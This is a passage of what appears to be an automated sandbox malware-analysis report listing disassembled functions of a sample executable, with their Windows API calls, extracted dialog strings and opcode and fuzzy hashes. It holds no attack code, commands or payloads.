                                                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                      • API String ID: 2141747552-1753850145
                                                                                                      • Opcode ID: 5517bbe381a17ced83241f4188c1e3bbe7dfcb6d88e74e29fdbd021e3ba87139
                                                                                                      • Instruction ID: d44c1271a9f8ba615be0571b8d532bdf1862496ed56d201f5020495d84006188
                                                                                                      • Opcode Fuzzy Hash: 5517bbe381a17ced83241f4188c1e3bbe7dfcb6d88e74e29fdbd021e3ba87139
                                                                                                      • Instruction Fuzzy Hash: 03E04FB1505747BEDB509B79A808F26FF957F90710F108935F114D3A42DBF4D0A58B54
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: 9d83d20a65235ce650a10cf6c51e28a374a8d92dc01d5b0d4042f25f9cf0078b
                                                                                                      • Instruction ID: f1ba72f083ee2c796af00e5f8cd99daa503ac44eabc04277afef77ba9800ce4b
                                                                                                      • Opcode Fuzzy Hash: 9d83d20a65235ce650a10cf6c51e28a374a8d92dc01d5b0d4042f25f9cf0078b
                                                                                                      • Instruction Fuzzy Hash: 9A41B036E00604DFCB20DFB8C991A9EB7F6EF84360F1545A9E515EB281D771AD82CB81
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00A189B8
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A189DB
                                                                                                        • Part of subcall function 00A159FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A123AA,?,0000015D,?,?,?,?,00A12F29,000000FF,00000000,?,?), ref: 00A15A2E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A18A01
                                                                                                      • _free.LIBCMT ref: 00A18A14
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A18A23
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 336800556-0
                                                                                                      • Opcode ID: 7aad8d4227094a502d5d15d49b794b15aef56eb5086d79e6d35bece1d3f9f6ac
                                                                                                      • Instruction ID: 217adb7ab120da66d9ded4407e7b4be62f11af7af24354274d048ee705b46fb0
                                                                                                      • Opcode Fuzzy Hash: 7aad8d4227094a502d5d15d49b794b15aef56eb5086d79e6d35bece1d3f9f6ac
                                                                                                      • Instruction Fuzzy Hash: 2F018472601615BF273197FA5D4DCFB696DDFC6FE0316022AF904D7102EE688C4281B1
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,?,00A15E43,00A15ADF,?,00A1634D,00000001,00000364,?,00A12213,?,?,00A2CBE8), ref: 00A163A8
                                                                                                      • _free.LIBCMT ref: 00A163DD
                                                                                                      • _free.LIBCMT ref: 00A16404
                                                                                                      • SetLastError.KERNEL32(00000000,?,00A2CBE8), ref: 00A16411
                                                                                                      • SetLastError.KERNEL32(00000000,?,00A2CBE8), ref: 00A1641A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: 9eafe69b4824e14239e3f3c68b91d65a68b4ac56362bf749375b5952de8168e3
                                                                                                      • Instruction ID: f74dd841a014144abf5edf91b62b48d2448af6fd55892b2721284bcbd109b896
                                                                                                      • Opcode Fuzzy Hash: 9eafe69b4824e14239e3f3c68b91d65a68b4ac56362bf749375b5952de8168e3
                                                                                                      • Instruction Fuzzy Hash: DD01F976385710A7971167782E89EEB262DDBE17B17314138F425D6193FF31CC874261
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00A19282
                                                                                                        • Part of subcall function 00A159C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?), ref: 00A159D8
                                                                                                        • Part of subcall function 00A159C2: GetLastError.KERNEL32(?,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?,?), ref: 00A159EA
                                                                                                      • _free.LIBCMT ref: 00A19294
                                                                                                      • _free.LIBCMT ref: 00A192A6
                                                                                                      • _free.LIBCMT ref: 00A192B8
                                                                                                      • _free.LIBCMT ref: 00A192CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: f4652e703510161cdef306abdc448a1033b1a5b0a1387f08b7d42500fe9f7e7c
                                                                                                      • Instruction ID: 0cf8bf36a384fc4d4d6e0f1cc709f46e4da792dd873c8b5c31869c3219db7e4b
                                                                                                      • Opcode Fuzzy Hash: f4652e703510161cdef306abdc448a1033b1a5b0a1387f08b7d42500fe9f7e7c
                                                                                                      • Instruction Fuzzy Hash: 8CF04F32A05700FB8A20EBACEA82CD773EAAB55360B544845F44CD7511C634FCC2C652
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00A1555D
                                                                                                        • Part of subcall function 00A159C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?), ref: 00A159D8
                                                                                                        • Part of subcall function 00A159C2: GetLastError.KERNEL32(?,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?,?), ref: 00A159EA
                                                                                                      • _free.LIBCMT ref: 00A1556F
                                                                                                      • _free.LIBCMT ref: 00A15582
                                                                                                      • _free.LIBCMT ref: 00A15593
                                                                                                      • _free.LIBCMT ref: 00A155A4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 81db7cd2528fff24d467df305feb860761bc7aec3efb7eb25bb8cc2dd3af9939
                                                                                                      • Instruction ID: c83f2e0d3c9e529d42c7034083afc98eafc487c07559ba5800ab95317b8ef5c9
                                                                                                      • Opcode Fuzzy Hash: 81db7cd2528fff24d467df305feb860761bc7aec3efb7eb25bb8cc2dd3af9939
                                                                                                      • Instruction Fuzzy Hash: C8F03ABCD22A20CB8B15EFBCBD014983BB1BBAA760345015AF40456272C73658839B93
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00A14C1A
                                                                                                      • _free.LIBCMT ref: 00A14CE5
                                                                                                      • _free.LIBCMT ref: 00A14CEF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$FileModuleName
                                                                                                      • String ID: C:\Users\user\Desktop\file.exe
                                                                                                      • API String ID: 2506810119-1957095476
                                                                                                      • Opcode ID: e9b74e4266602e43f0194f866f537449f4218e644e83dc5265bb0538da4846c1
                                                                                                      • Instruction ID: f9f4d319edf2088fbe17a7af8845f15ddb9bd958dd0dd41bd7eeec1616445127
                                                                                                      • Opcode Fuzzy Hash: e9b74e4266602e43f0194f866f537449f4218e644e83dc5265bb0538da4846c1
                                                                                                      • Instruction Fuzzy Hash: 24318E79E01218EFDB21DFADDD819DEBBFCEB89710B104066F8049B211D7719A81CBA1
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F7468
                                                                                                        • Part of subcall function 009F3AA3: __EH_prolog.LIBCMT ref: 009F3AA8
                                                                                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 009F752E
                                                                                                        • Part of subcall function 009F7A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 009F7AAC
                                                                                                        • Part of subcall function 009F7A9D: GetLastError.KERNEL32 ref: 009F7AF2
                                                                                                        • Part of subcall function 009F7A9D: CloseHandle.KERNEL32(?), ref: 009F7B01
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                      • API String ID: 3813983858-639343689
                                                                                                      • Opcode ID: 799718d310db1fd052e88ea07cd441c415e131f04b5e7a3aaab347ff5f9787ff
                                                                                                      • Instruction ID: a4190cc502fa50747d5ea739bfeb79f5fb1fb09181258e950eb64d5e791fec50
                                                                                                      • Opcode Fuzzy Hash: 799718d310db1fd052e88ea07cd441c415e131f04b5e7a3aaab347ff5f9787ff
                                                                                                      • Instruction Fuzzy Hash: 3C318F7190420CAEDF20EFA8EC42BFEBB79AF84724F004035FA49A7292D7745A45C761
                                                                                                      APIs
                                                                                                      • CharUpperW.USER32(?,?,?,?,00001000), ref: 00A0A92C
                                                                                                      • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00A0A953
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharUpper
                                                                                                      • String ID: -
                                                                                                      • API String ID: 9403516-2547889144
                                                                                                      • Opcode ID: 27bc29ad523f9d40aee9ab42c6c3b1f01ee95426f082236bf78ba23f501c4278
                                                                                                      • Instruction ID: 6771e6a7f95adc29a3243fd4913a8294f9482442a147245898736aa6047a07bd
                                                                                                      • Opcode Fuzzy Hash: 27bc29ad523f9d40aee9ab42c6c3b1f01ee95426f082236bf78ba23f501c4278
                                                                                                      • Instruction Fuzzy Hash: D521087260430E69D320EB68B90CB7BBBA8E7B53D4F02451AF584C24C1E774D898D363
                                                                                                      APIs
                                                                                                        • Part of subcall function 009F12E7: GetDlgItem.USER32(00000000,00003021), ref: 009F132B
                                                                                                        • Part of subcall function 009F12E7: SetWindowTextW.USER32(00000000,00A202E4), ref: 009F1341
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A091AB
                                                                                                      • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 00A091C0
                                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A091D5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemText$DialogWindow
                                                                                                      • String ID: ASKNEXTVOL
                                                                                                      • API String ID: 445417207-3402441367
                                                                                                      • Opcode ID: f70c87d0a6548173724653c400759f80df4d6574e9a7efc07b6661755dd495d6
                                                                                                      • Instruction ID: 74bd8a17730e7eff91a647e832ba8133b1971d5b02da5055b0f261495cd49d2d
                                                                                                      • Opcode Fuzzy Hash: f70c87d0a6548173724653c400759f80df4d6574e9a7efc07b6661755dd495d6
                                                                                                      • Instruction Fuzzy Hash: 1311D63634560ABFD251DBE8ED4DF673769AF9B741F014510F2059B0E2C3629C02D766
                                                                                                      APIs
                                                                                                        • Part of subcall function 009F12E7: GetDlgItem.USER32(00000000,00003021), ref: 009F132B
                                                                                                        • Part of subcall function 009F12E7: SetWindowTextW.USER32(00000000,00A202E4), ref: 009F1341
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A09694
                                                                                                      • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 00A096AC
                                                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A096DA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemText$DialogWindow
                                                                                                      • String ID: GETPASSWORD1
                                                                                                      • API String ID: 445417207-3292211884
                                                                                                      • Opcode ID: 079ab4ad0b9e8f482c3294a6d66ad9fed3c0fd05788cd0b9919a09cce74d6c93
                                                                                                      • Instruction ID: 8e346e19d06cf9a4bcc7c520ea0afda4e420ea3f8b8103a589f43f123e94f00f
                                                                                                      • Opcode Fuzzy Hash: 079ab4ad0b9e8f482c3294a6d66ad9fed3c0fd05788cd0b9919a09cce74d6c93
                                                                                                      • Instruction Fuzzy Hash: F511ED3290011D7BDB219EA8AD49FFB376CEB5A790F000020FA49A25C1C6A6A90297A1
                                                                                                      APIs
                                                                                                      • _swprintf.LIBCMT ref: 009FB127
                                                                                                        • Part of subcall function 009F3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F3F6E
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 009FB145
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 009FB155
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                      • String ID: %c:\
                                                                                                      • API String ID: 525462905-3142399695
                                                                                                      • Opcode ID: 0e585dd396f7124578c31f62f58c51016014e403ee3ebe28a5d8c70bfb0ab444
                                                                                                      • Instruction ID: 7404ae9e53b077134f787ffc90f816828016eacb5790c548185e38216eee333a
                                                                                                      • Opcode Fuzzy Hash: 0e585dd396f7124578c31f62f58c51016014e403ee3ebe28a5d8c70bfb0ab444
                                                                                                      • Instruction Fuzzy Hash: 3001F5176083157ADB30AF65DD42DBBB7ACEE953B0B54451AFE44C6082FB24D8A4C3A1
                                                                                                      APIs
                                                                                                      • InitializeCriticalSection.KERNEL32(000001A0,00A31E74,00000000,?,?,009FFB88,00000020,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?), ref: 009FF969
                                                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?,?,?,00A03AFF), ref: 009FF973
                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?,?,?,00A03AFF), ref: 009FF983
                                                                                                      Strings
                                                                                                      • Thread pool initialization failed., xrefs: 009FF99B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                      • String ID: Thread pool initialization failed.
                                                                                                      • API String ID: 3340455307-2182114853
                                                                                                      • Opcode ID: a112083448f82bdcc7b091791fb58c66133cde736033ee4d488cc5f5005e94e0
                                                                                                      • Instruction ID: 8cc77a650e21a38594f99ccddea301ec9bc34c1e659f8a9e5b05ae86e6ff8fe7
                                                                                                      • Opcode Fuzzy Hash: a112083448f82bdcc7b091791fb58c66133cde736033ee4d488cc5f5005e94e0
                                                                                                      • Instruction Fuzzy Hash: AA115EB1600709AFD3305F699895BB7FBECFF95355F10483EE2DA82241DA712881CB50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                      • API String ID: 0-56093855
                                                                                                      • Opcode ID: 0686d144c3d0ab2f69632552ed79eca033089b5767639d51fd9ef6d99a98aa64
                                                                                                      • Instruction ID: 0dbeecb8d2d1cfabf5ab156f0adbec965861099b5a4ac110c0e21bdf4d9be44f
                                                                                                      • Opcode Fuzzy Hash: 0686d144c3d0ab2f69632552ed79eca033089b5767639d51fd9ef6d99a98aa64
                                                                                                      • Instruction Fuzzy Hash: 9F01527655520ABFC711DB98FE40A26BBA9E759794F000536F54193270D3329C06DF71
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 009FCE57
                                                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 009FCE66
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindHandleModuleResource
                                                                                                      • String ID: LTR$RTL
                                                                                                      • API String ID: 3537982541-719208805
                                                                                                      • Opcode ID: 33237a1cb59a0c24ea029b32eb650e23e394f58d29ca60937c35c294e6ac32d5
                                                                                                      • Instruction ID: 23a65bd8de67a547572a8014afb7cb6bb156ea613013d48b355bbc30cd0dc6f1
                                                                                                      • Opcode Fuzzy Hash: 33237a1cb59a0c24ea029b32eb650e23e394f58d29ca60937c35c294e6ac32d5
                                                                                                      • Instruction Fuzzy Hash: 43F02B7160435C6BF73496B96C0AFB73BACE785B10F00866DF605860C1DBA5994A87B4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1036877536-0
                                                                                                      • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                                      • Instruction ID: 8bc61a5c2943fcfa8e96072ce6ad6cffd9d947830a9fa831ae1418dd9625ea93
                                                                                                      • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                                      • Instruction Fuzzy Hash: FAA16676A003869FEB25CF68C891BEEBBE5EF55314F1841ADE495DB282C2389DC1C750
                                                                                                      APIs
